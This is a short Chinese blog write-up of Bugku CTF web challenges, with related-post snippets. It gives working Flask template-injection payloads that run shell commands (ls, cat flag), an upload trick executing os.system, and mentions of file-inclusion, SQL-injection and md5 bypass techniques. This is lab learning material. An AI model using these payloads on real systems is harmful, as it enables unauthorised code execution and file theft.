ctf.buyku web

于 2024-07-30 20:01:23 发布
阅读量255 收藏 2
点赞数 8
文章标签: flask python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_66503195/article/details/140805366
版权

Simple_SSTI_1

进入后查看源码

/?flag={{config.SECRET_KEY}}

Simple_SSTI_2

打开题目 需要传入一个名为flag的参数

查看config对象

http://114.67.175.224:16000/?flag={{config}}

SSTI模版注入

http://114.67.175.224:16000/?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27ls%20../%27).read()%20}}

查看app文件,用ls查看app文件里面的内容

找到flag

使用cat查看flag文件内容,cat ../app/flag

得到flag

Flask_FileUpload

进入环境查看源代码

import os
print(os.system('ls ./'))

用jpg后缀

查看源代码

查看app.py

查到flag

import os

print(os.system('cat /flag'))

滑稽

计算器

进来发现只有一个框发现只能输入一个数

用检查或F12打开进入修改

然后算数

还好160
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
ctf.show与学习笔记
Q221022的博客
01-29 3123
ctf.show 1.密码学签到 看到密文之后不难发现,flag就是倒着写的,直接将密文倒叙输出就是答案 2. 看到题目,全是由符号组成的,将题目内容全部复制到控制台,回车即可得到答案 3. 第三题与第二题看起来是一样的,所以先将其复制到控制台,发现报错了,有中文的引号,将所有的引号全部换成英文之后还是没有得到flag,········(不会了,没有思路了) 4. 直接用工具计算出私钥d即可 5. 根据rsa密码的解密规则解出m 6. 没有判断出...
国科大web安全中期CTF.pdf
11-22
国科大web安全中期CTF 在这篇文章中,我们将探讨国科大web安全中期CTF的相关知识点。 一、Web安全基础知识 在开始之前,让我们先了解一些基本概念。Web安全是指保护Web应用程序免受恶意攻击和未经授权的访问的...
ctf.show web3
m0_63028223的博客
04-25 1389
打开题目,出现提示,php文件?,考虑文件包含漏洞。 输入参数:?url=/etc/passwd 这个报错界面出来了,说明存在文件包含漏洞 构造url值 =php://input 使用php协议 使用burp抓包 使用ls命令查看php下的文件 得到文件路径。。。。 使用cat方法查看 最终得到flag。。。。。。。。 发文助手检测到文字太少,无奈再说点什么吧,信息安全渗透,学习需要一个积累的过程,需要可以不精通但最少了解 php,java,j...
ctf.show web web1-web10
qq_61993117的博客
09-17 1814
记录一些web的知识点,本人刚开始学习web很多资料都是借鉴大佬的,许多复现的过程都是大同小异的,写的菜了请大佬们下手轻点。
ctf.show_web4
Kobalos的博客
12-15 2701
查看题目 发现题目要求get请求传输一个url参数,并且看到了include,估计需要使用伪协议进行包含,进行尝试 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=php://input 发现报错error,继续尝试其他协议发现都显示error 尝试直接在后面加文件 http://28d722fe-b9a5-4ab9-887f-d07990104493.challenge.ctf.show/?url=/etc/pa
ctf.show web7
qq_53319483的博客
11-17 3528
ctf.show web7
ctf.show_web11
qq_62046696的博客
06-11 988
目录ctf.show_web11ctf.show_web12 ,password是由我们自己输入的,session中的password存储在本地,所以我们只需要输入空密码,并且将本地的session删除即可成功绕过。右击删除然后输入空,或者方法二:burp抓包 因为字段都为空,所以就会等于 刚开始也是发懵,看了大佬的wp恍然大悟可谓是,先ctrl+u查看源码发现有一个?cmd既然提示了cmd=,那么可能后端代码中存在 eval() 或者exec()等可以执行命令的代码。 然后?cmd=phpin
ctf.show web入门
nidaxin的博客
01-21 5293
信息收集 web1:【where is flag】 打开开发者工具 web2:【无法查看源代码】 ctrl+u或者开发者工具·都可以 web3:【where is flag】 直接抓包,查看响应包 web4:【robots】 Robots协议:也称为爬虫协议、机器人协议等,其全称为“网络爬虫排除标准",它通常是一个叫做robots.txt的文本文件,一般放在网站的根目录下。网站通过Robots协议告诉搜索引擎哪些页面可以抓取,哪些页面不能抓取。 先抓包,发现响应包里面并没有f.
ctf.show web2 最简单的SQL注入
m0_46412682的博客
07-12 5079
ctf.show web2 最简单的SQL注入 1、一开始的页面 随便输入用户名和密码看它怎么反应 没报错,只是清空了用户名和密码 题目提示是sql注入,那就用burpsuit抓个包,发送到repeater 点击go 既然是登录的页面,那就用万能密码 ’ or 1=1 #,出现欢迎您,ctfshow,说明登录成功,这里得说明一下username=admin’ or 1=1 #password=123这条语句,#号是注释符,所以后面的语句是被注释掉的,所以剩下username=admin’ or 1=1,o
CTF.show:web13
qq_46230755的博客
01-15 1864
扫描后发现存在upload.php.bak .bak文件是备份文件。 这里列举一下常见的源码泄露 .hg源码泄漏 .git源码泄漏 .DS_Store文件泄漏 .phps .bak结尾的网页 <?php header("content-type:text/html;charset=utf-8"); $filename = $_FILES['file']['name']; $temp_name = $_FILES['file']['tmp_name']; $size = $_FILES.
ctf.show
nidaxin的博客
02-05 3019
爆破 21.【自定义迭代器】 先抓包看看,返回包里面有个admin,所以就猜测用户名是admin
WEB-CTF.xmind
01-12
WEB-CTF.xmind
信息安全_.第六期.CTF.Web之Vulnhub靶场.课件资料.pptx
08-14
CTF Web部分主要关注Web应用程序的安全,涉及的知识点包括但不限于Web服务器配置、编程语言漏洞、数据库交互安全、文件上传漏洞、XSS跨站脚本、CSRF跨站请求伪造等。无论是初学者还是经验丰富的选手,都能在CTF中...
国科大web安全技术期末CTF.pdf
11-22
国科大web安全技术期末CTF
CTF工具之WEB.zip
10-07
【标题】:CTF工具之WEB.zip 【正文】: CTF(Capture The Flag)是一项网络安全竞赛,参与者通过解决各种安全挑战来展示他们的技术技能。这个名为“CTF工具之WEB.zip”的压缩包,显然是专门为参与此类比赛的选手...
python使用flask,调用文件方法
qq_34631220的博客
07-24 346
【代码】python使用flask,调用文件方法。
快醒醒,别睡了!...讲《数据分析pandas库》了—/—<4>
最新发布
qq_64603703的博客
07-27 949
详细解说数据分析pandas库中的常用方法
全网最详细Gradio教程系列5——Gradio Client: python
shao918516的博客
07-26 1045
程序部署完成后,如何将Gradio App作为API访问使用呢,这就用到Gradio Client。本章讲解Gradio Client的三种使用方式:python、javascript和curl,受字数限制,所以分三篇博客发布。 使用Gradio Python Client非常易于将Gradio应用程序作为API使用,本节讲述gradio_client安装、如何连接Gradio应用程序、查看可用API及其使用方式、job及session等用法。 通过Gradio Python Cli
全面解析 SnowNLP:中文文本处理、情感分析
有勇气的牛排博客
07-24 698
SnowNLP 是一个专门用于处理中文文本的 Python库。分词情感分析关键词提取文本分类拼音转换繁体转简体词相似度计算等测试环境:Python3.10.9尚未测出该功能text = "有勇气的牛排写的文章通俗易懂,爱了爱了"文本分类使用的是 SnowNLP 的情感分析模型。
ctf.show_web5
10-22
ctf.show_web5是一个CTF比赛中的WEB模块第5关,需要传递两个参数v1和v2,要求v1必须是纯字母字符串,v2必须是数字或数字字符串,并且两个参数的md5值必须相等。可以利用md5的0e漏洞进行绕过。具体来说,可以构造一个字符串,使得它的md5值以0e开头,然后将这个字符串作为v1和v2的值传递即可。在PHP中,当字符串以0e开头并且后面跟着一串数字时,PHP会将这个字符串解析成科学计数法的形式,因此可以绕过is_numeric()函数的检测。而ctype_alpha()函数只检测字符串中是否仅包含字母,不会对字符串进行其他处理,因此不会受到0e漏洞的影响。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值